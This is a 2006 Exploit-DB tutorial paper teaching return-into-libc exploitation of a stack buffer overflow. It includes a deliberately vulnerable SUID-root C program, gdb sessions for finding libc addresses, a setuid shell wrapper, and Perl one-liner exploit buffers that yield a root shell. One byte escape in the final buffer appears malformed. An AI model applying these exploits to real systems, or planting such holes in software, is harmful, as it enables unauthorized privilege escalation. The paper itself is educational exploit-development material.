Exploitation - Returning into libc

EDB-ID:

13197

CVE:

N/A

Author:

shaun2k2

Type:

papers

Platform:

Multiple

Published:

2006-04-08

                     __           __           __                     
  .-----.--.--.----.|  |.--.--.--|  |.-----.--|  |  .-----.----.-----.
  |  -__|_   _|  __||  ||  |  |  _  ||  -__|  _  |__|  _  |   _|  _  |
  |_____|__.__|____||__||_____|_____||_____|_____|__|_____|__| |___  |
   by shaun2k2 - member of excluded-team                       |_____|


                     ######################################
		     # Exploitation - Returning into libc #
		     ######################################

				


################
# Introduction #
################

Generic vulnerabilities in applications such as the infamous "buffer overflow 
vulnerability" crop up reguarly in many immensely popular software packages 
thought to be secure by most, and programmers continue to make the same mistakes 
as a result of lazy or sloppy coding practices.  As programmers wisen up to the 
common techniques employed by hackers when exploiting buffer overflow 
vulnerabilities, the likelihood of having the ability to execute arbitrary 
shellcode on the program stack decreases.  One such example of why is the fact
that some Operating Systems are beginning to use non-exec stacks by default, 
which makes executing shellcode on the stack when exploiting a vulnerable 
application is a significantly more challenging task.  Another possibility is 
that many IDSs automatically detect simple shellcodes, making injecting 
shellcode more of a task.
As with most scenarios, with a problem comes a solution.  With a little 
knowledge of the libc functions and their operation, one can take an alternate 
approach to executing arbitrary code as a result of exploitation of a buffer 
overflow vulnerability or another bug: returning to libc.


The intention of this article is not to teach you the in's and out's of buffer 
overflows, but to explain in a little detail another technique used to execute 
arbitrary code as opposed to the classic 'NOP sled + shellcode + repeated 
retaddr' method.  I assume readers are familiar with buffer overflow 
vulnerabilities and the basics of how to exploit them.  Also a little bit of the 
theory of memory organisation is desirable, such as how the little-endian bit 
ordering system works.  To those who are not familiar with buffer overflow bugs, 
I suggest you read "Smashing the Stack for Fun and Profit".

<http://www.phrack.org/phrack/49/P49-14>


#######################
# Returning into libc #
#######################

As the name suggests, the entire concept of the technique is that instead of 
overwriting the EIP register with the predicted or approxamate address of your 
NOP sled in memory or your shellcode, you overwrite EIP with the address of a 
function contained within the libc library, with any function arguments 
following.  An example of such would be to exploit a buffer overflow bug to
overwrite EIP with the address of system() or execl() included in the libc 
library to run an interactive shell (/bin/sh for example).  This idea is quite 
reasonable, and since it does not involve estimating return addresses and 
building large exploit buffers, this is quite an appealing technique, but it 
does have it's downsides which I shall explain later.

Let me demonstrate an example of the technique.  Let's say we have the following 
small example program, vulnprog:


--START
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {

if(argc < 2) {
printf("Usage: %s <string>\n", argv[0]);
exit(-1);
}

char buf[5];

strcpy(buf, argv[1]);
return(0);
}


gcc vulnprog.c -o vulnprog
chown root vulnprog
chmod +s vulnprog

--END


Anyone with a tiny bit of knowledge of buffer overflows can see that the 
preceding program is ridiculously insecure, and allows anybody who exceeds the 
bounds of `buf' to overwrite data on the stack.  It would usually be quite easy 
to write an exploit for the above example program, but let's assume that our 
friendly administrator has just read a computer security book and has enabled a 
non-executable stack as a security measure.  This requires us to think a little 
out of the box in order to be able to execute arbitrary code, but we already 
have our solution; return into a libc function.

How, you may ask, do we actually get the information we need and prepare an 
'exploit buffer' in order to execute a libc function as a result of a buffer 
overflow?  Well, all we need is the address of the desired libc function, and 
the address of any function arguments.  So let's say for example we wanted to 
exploit the above program (it is SUID root) to execute a shell (we want /bin/sh) 
using system() - all we'd need is the address of system() and then the address 
holding the string "/bin/sh" right?  Correct.  "But how do we begin to get this 
info?".  That is what we're about to find out.


--START
[shaunige@localhost shaunige]$ echo "int main() { system(); }" > test.c
[shaunige@localhost shaunige]$ cat test.c
int main() { system(); }
[shaunige@localhost shaunige]$ gcc test.c -o test
[shaunige@localhost shaunige]$ gdb -q test
(gdb) break main
Breakpoint 1 at 0x8048342
(gdb) run
Starting program: /home/shaunige/test

Breakpoint 1, 0x08048342 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x4005f310 <system>
(gdb) quit
The program is running.  Exit anyway? (y or n) y
[shaunige@localhost shaunige]$
--END


First, I create a tiny dummy program which calls the libc function 'system()' 
without any arguments, and compiled it.  Next, I ran gdb ready to debug our 
dummy program, and I told gdb to report breakpoints before running the dummy 
program.  By examining the report, we get the location of the libc function 
system() in memory - and it shall remain there until libc is recompiled.  So, 
now we have the address of system(), which puts us half way there.  However, we 
still need to know how we can store the string "/bin/sh" in memory and 
ultimately reference it whenever needed.  Let's think about this for a moment.  
Maybe we could use an environmental variable to hold the string?  Yes, infact, 
an environmental variable would be ideal for this task, so let's create and use 
an environment variable called $HACK to store our string ("/bin/sh").  But how 
are we going to know the memory address of our environment variable and 
ultimately our string?  We can write a simple utility program to grab the memory 
address of the environmental variable.  Consider the following code:


--START
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {

if(argc < 2) {
printf("Usage: %s <environ_var>\n", argv[0]);
exit(-1);
}

char *addr_ptr;

addr_ptr = getenv(argv[1]);

if(addr_ptr == NULL) {
printf("Environmental variable %s does not exist!\n", argv[1]);
exit(-1);
}

printf("%s is stored at address %p\n", argv[1], addr_ptr);
return(0);
}
--END


This program will give us the address of a given environment variable, let's 
test it out:


--START
[shaunige@localhost shaunige]$ gcc getenv.c -o getenv
[shaunige@localhost shaunige]$ ./getenv TEST
Environmental variable TEST does not exist!
[shaunige@localhost shaunige]$ ./getenv HOME
HOME is stored at address 0xbffffee2
[shaunige@localhost shaunige]$
--END


Great, it seems to work.  Now, let's get down to actually creating our variable 
with the desired string "/bin/sh" and get the address of it.

First I create the environmental variable, and then I run our above program to 
get the memory location of a desired environment variable:


--START
[shaunige@localhost shaunige]$ export HACK="/bin/sh"
[shaunige@localhost shaunige]$ echo $HACK
/bin/sh
[shaunige@localhost shaunige]$ ./getenv HACK
HACK is stored at address 0xbffff9d8
[shaunige@localhost shaunige]$
--END


This is good, we now have all of the information we need to exploit the 
vulnerable program: the address of 'system()' (0x4005f310) and the address of 
the environmental variable $HACK holding our string "/bin/sh" (0xbffff9d8).  So, 
what do we do with this stuff?  Well, like in all instances of exploiting a 
buffer overflow hole, we craft an exploit buffer, but ours is somewhat different 
to one you may be used to seeing, with repeated NOPs (known as a 'NOP sled'), 
shellcode and repeated return addresses.  Ours exploit buffer needs to look 
something like this:


--START


-----------------------------------------------------------------------------  
|     system() addr     |     return address     |     system() argument    |
-----------------------------------------------------------------------------

--END


"But wait, I thought you said we don't need a return address?".  We don't, but 
libc functions always require a return address to JuMP to after the function has 
finished it's job, but we don't care if the program segmentation faults after 
running the shell, so we don't even need a return address.  Instead, we'll just 
specify 4 bytes of garbage data, "HACK" for example.  So, with this in mind, a 
representation of our whole buffer needs to look like this:


--START

----------------------------------------------------------------------
|  DATA-TO-OVERFLOW-BUFFER   |   0x4005f310  |  HACK  |  0xbffff9d8  |
----------------------------------------------------------------------

--END


The data represented by 'DATA-TO-OVERFLOW-BUFFER' is just garbage data used to 
overflow beyond the bounds ("boundaries") of the `buff' variable enough to 
position the address of libc 'system()' function (0x4005f310) into the EIP 
register.

It looks now like we have all of the information and theory of concept we need: 
build a buffer containing the address of a libc function, followed by a return 
address to JuMP to after executing the function, followed by any function
arguments for the libc function.  The buffer will need garbage data at the 
beginning so as to overflow far enough into memory to overwrite the EIP register 
with the address of system() so that it jumps to it instead of the next 
instruction in the program (the same technique used when using shellcode: inject 
an arbitrary memory address into EIP).  Now that we have all of the necessary 
theory of this technique and the required information for actually implementing 
it (i.e address of a libc function and memory address of string "/bin/sh" etc), 
let's exploit this bitch!


################
# EXPLOITATION #
################

We have the necessary stuff, so let's get on with the ultimate goal: to get a 
root shell by executing 'system("/bin/sh")' rather than shellcode!  Let's assume 
that we are exploiting a Linux system with a non-executable stack, so we have no 
other option than to 'return into libc'.

Remembering back to the diagram representation of our exploit buffer, we should 
recall that garbage data must precede the buffer so that we are writing into 
EIP, followed by the memory location of 'system()', then followed by a return 
address which we do not need, followed by the memory address of "/bin/sh".  
Let's see if we can exploit vulnprog.c this way.  If you think back, we have 
already set and exported the environmental variable $HACK, but let's do it again 
and grab the memory address, just for clarity's sake.


--START
[shaunige@localhost shaunige]$ export HACK="/bin/sh"
[shaunige@localhost shaunige]$ echo $HACK
/bin/sh
[shaunige@localhost shaunige]$ ./getenv HACK
HACK is stored at address 0xbffff9d8
[shaunige@localhost shaunige]$
--END


Good, we now have the address of our string.  You should also remember that we 
created a dummy program which called 'system()' from which we got our address of 
system() with the help of GDB.  The address was 0x4005f310.  We've got the 
stuff, let's write that exploit!  We'll do it with Perl from the console, 
because it gives us more flexibility and more room for testing than writing a 
larger program in C does.

First, we must reverse the addresses of 'system'() and the environment variable 
holding "/bin/sh" due to the fact that we are working on a system using the 
little-endian byte ordering system.  This gives us:


'system()' address:
####################

\x10\xf3\x05\x40


$HACK's address:
#################

\xd8\xf9\xff\xbf


And we know that for the return address required by all libc functions just 
needs to be a 4-byte value.  We'll just use "HACK".  Therefore, our exploit
buffer looks like this so far:


\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf

But something is missing.  In it's current state, if fed to vulnprog, the 
address of 'system()' would NOT overwrite into EIP like we want, because we 
wouldn't have overflowed the 'buf' variable enough to reach the location of the 
EIP register.  So, as shown on our above diagram of our exploit buffer, we're 
going to need to prepend garbage data onto the beginning of our exploit buffer 
to overwrite far enough into the stack region to reach EIP so that we can 
overwrite that return address.  How can we know how much garbage data we need, 
as it needs to be spot on?  The only reasonable way is just trial-n-error.  Due 
to playing with vulnprog a little, I found that we will probably need about 6-9 
words of garbage data.


--START

[shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x6 . 
"\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'`
Segmentation fault

[shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x9 . 
"\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'
Segmentation fault

[shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x8 . 
"\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'
Segmentation fault

[shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x7 .
"\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'
sh-2.05b$ whoami
shaunige
sh-2.05b$ exit
exit
[shaunige@localhost shaun]$

--END


The exploit worked, and it needed 7 words of dummy data.  But wait, why don't we 
have a rootshell?  ``vulnprog'' is SUID root, so what's going on?  'system()' 
runs the specified path (in our case "/bin/sh") through /bin/sh itself, so the 
privileges were dropped, thus giving us a shell, but not a rootshell.  
Therefore, the exploit *did* work, but we're going to have to use a libc 
function that *doesn't* drop privileges before executing the path specified 
("/bin/sh" in our scenario).  


#####################
# Using a 'wrapper' #
#####################

Hmm, what to do?  We're going to have to use one of the exec() functions, as 
they do not use /bin/sh, thus not dropping privileges.  First, let's make our 
job a little easier, and create a little program that will run a shell for us 
(called a wrapper program).  


--START
/* expl_wrapper.c */

#include <stdio.h>
#include <stdlib.h>

int main() {
setuid(0);
setgid(0);
system("/bin/sh");
}
--END


We need a plan: instead of using 'system()' to run a shell, we'll overwrite the 
return address on stack (EIP register) with the address of 'execl()' function in 
the libc library.  We'll tell 'execl()' to execute our wrapper program 
(expl_wrpper.c), which raises our privs and executes a shell.  Voila, a root 
shell.  However, this is not going to be as easy as the last experiment.  For a 
start, the execl() function needs NULLs as the last function argument, but 
'strcpy()' in vulnprog.c will think that a NULL (\x00 in hex representation) 
means the end of the string, thus making the exploit fail.  Instead, we can use 
'printf()' to write NULLs without NULL's appearing in the exploit buffer.  Our 
exploit buffer needs to this time look like this:


--START

-------------------------------------------------------------------------------
GARBAGE|printf() addr|execl() addr| %3$n addr|wrapper addr|wrapper addr|addr of 
here |-------------------------------------------------------------------------
------

--END


You may notice "%3$n addr".  This is a format string for 'printf()', and due to 
direct parameter access, it will skip over the two "wrapper addr" addresses, and 
place NULLs at the end of the exploit buffer.  This time, the address of 
'printf()' is overwritten into EIP, executing 'printf()' first, followed by the 
execution of our wrapper program.  This will result in a rootshell since 
vulnprog is SUID root.

'addr of here' needs to be the address of itself, which will be overwritten by 
NULLs when 'printf()' skips over the first 2 parameters of the 'execl' call.

To get the addresses of 'printf()' and 'execl()' libc library functions, we'll 
again write a tiny test program, and use GDB to help us out.


--START
/* test.c */

#include <stdio.h>

int main() {
execl();
printf(0);
}

[shaunige@localhost shaunige]$ gcc test.c -o test -g
[shaunige@localhost shaunige]$ gdb -q ./test
(gdb) break main
Breakpoint 1 at 0x804837c: file test.c, line 4.
(gdb) run
Starting program: /home/shaunige/test

Breakpoint 1, main () at test.c:4
4               execl();
(gdb) p execl
$1 = {<text variable, no debug info>} 0x400bde80 <execl>
(gdb) p printf
$2 = {<text variable, no debug info>} 0x4006e310 <printf>
(gdb) quit
The program is running.  Exit anyway? (y or n) y
[shaunige@localhost shaunige]$
--END


Excellent, just as we wanted, we have now the addresses of libc 'execl()' and 
'printf()'.  We'll be using 'printf()' to write NULLs (with the format string 
"%3$n"), so we'll need to write the printf() format string %3$n into memory.  
Using the format string %3$n to write NULLs works because it uses direct 
positional parameters (hence the '$' in the format string) - %3 tells it to skip 
over the first two function arguments of 'execl()' (address of our wrapper 
program followed by the address of the wrapper program again), and writes NULLs 
into the location after the second argument of the execl function.  Let's use an 
environment variable again, due to past success with them.  We'll use also an 
environment variable to store the path of our wrapper program which invokes a 
shell, "/home/shaunige/wrapper".


--START
[shaunige@localhost shaunige]$ export NULLSTR="%3\$n"
[shaunige@localhost shaunige]$ echo $NULLSTR
%3$n
[shaunige@localhost shaunige]$ export WRAPPER_PROG="/home/shaunige/wrapper"
[shaunige@localhost shaunige]$ echo $WRAPPER_PROG
/home/shaunige/wrapper
[shaunige@localhost shaunige]$ ./getenv NULLSTR
NULLSTR is stored at address 0xbfffff5f
[shaunige@localhost shaunige]$ ./getenv WRAPPER_PROG
WRAPPER_PROG is stored at address 0xbffff9a9
[shaunige@localhost shaunige]$
--END


We now have all of the addresses which we need, except the last argument: 'addr 
of here'.  This needs to be the address of the buffer when it is copied over.  
It needs to be the memory address of the overflowable 'buf' variable + 48 bytes. 
 But how will we get the address of 'buf'?  All we need to do is add an extra 
line of code to vulnprog.c, recompile it, and we will have the address in memory 
of 'buf':


--START
[shaunige@localhost shaunige]$ cat vulnprog.c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <string>\n", argv[0]);
exit(-1);
}

char buf[5];

printf("addr of buf is: %p\n", buf);

strcpy(buf, argv[1]);
return(0);
}

[shaunige@localhost shaunige]$ gcc vulnprog.c -o vulnprog
[shaunige@localhost pcalc-000]$ ../vulnprog `perl -e 'print
"1234"x13'`
addr of buf is: 0xbffff780
Segmentation fault
[shaunige@localhost pcalc-000]$--END
--END


With a little simple hexadecimal addition, we can determine that 0xbffff780 + 48 
= 0xbffff7b0.  This is the address which is the final function argument of 
'execl()', where the NULLs will be located.  We now have all of the information 
we need, so exploitation will be easy.  Again, I'm going to craft the exploit 
buffer from the console with perl, let's get going!


--START

[shaunige@localhost shaunige]$ ./vulnprog `perl -e 'print "1234"x7 . 
"\x10\xe3\x06\x40" . "\x80\xde\x0b\x40" . "\x5f\xff\xff\xbf" . "\xa9\xf9\xff\bf" 
. "\xa9\xf9\xff\xbf" . "\xb0\xf7\xff\xbf"'`

sh-2.05b#

--END


Well, well, looks like our little exploit worked!  Depending on your machine's 
stack, you may need more garbage data (used for spacing) preceding your exploit 
buffer, but it worked fine for us.

The exploit buffer was fed to 'vulnprog' thus overwriting the return address on 
stack with the address of the libc 'printf()' function.  'printf()' then wrote 
NULLs into the correct place, and exited.  Then 'execl()' executed our wrapper 
program as instructed, which was designed to invoke a shell (/bin/sh) with 
privileges of 'vulnprog' (root), leaving us with a lovely rootshell.  Voila.



##############
# Conclusion #
##############

I have hopefully given you a quick insight on an alternative to executing 
arbitrary code during the exploitation of a stack-based overflow vulnerability 
in a given program.  Non-executable stacks are becoming more and more common in 
modern Operating Systems, and knowing how to 'return into libc' rather than 
using shellcode can be a very useful thing to know.  I hope you've enjoyed this 
article, I appreciate feedback.

<shaun2k2@excluded.org>
http://www.excluded.org


# milw0rm.com [2006-04-08]